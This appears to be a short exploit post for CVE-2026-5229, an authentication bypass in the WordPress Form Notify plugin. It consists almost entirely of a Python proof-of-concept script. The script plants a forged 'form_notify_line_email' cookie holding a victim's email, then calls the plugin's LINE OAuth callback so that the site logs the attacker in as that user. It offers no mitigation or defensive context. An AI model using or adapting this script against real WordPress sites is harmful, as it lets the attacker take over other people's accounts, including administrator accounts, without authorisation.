CVE-2026-5229 WordPress Form Notify认证绕过漏洞

# Exploit Concept for CVE-2026-5229: Authentication Bypass in Form Notify Plugin import requests target_url = "http://target-wordpress-site.com" victim_email = "[email protected]" # Create a session to maintain cookies session = requests.Session() # Step 1: Inject the malicious cookie containing the victim's email # The plugin trusts this cookie value when LINE does not provide an email session.cookies.set('form_notify_line_email', victim_email, domain=target_url.replace('http://', '')) # Step 2: Simulate the LINE OAuth callback # The attacker initiates the login process. The plugin sees a valid LINE login # but uses the injected cookie email to determine which WP user to log in. oauth_endpoint = f"{target_url}/?form_notify_line_login_callback=1" try: response = session.get(oauth_endpoint, allow_redirects=False) if response.status_code == 302 or 'wp-admin' in response.url: print("[+] Exploit successful! Logged in as user: %s" % victim_email) print("[+] Redirected to:", response.headers.get('Location', response.url)) else: print("[-] Exploit failed or logic changed.") except Exception as e: print("Error:", e)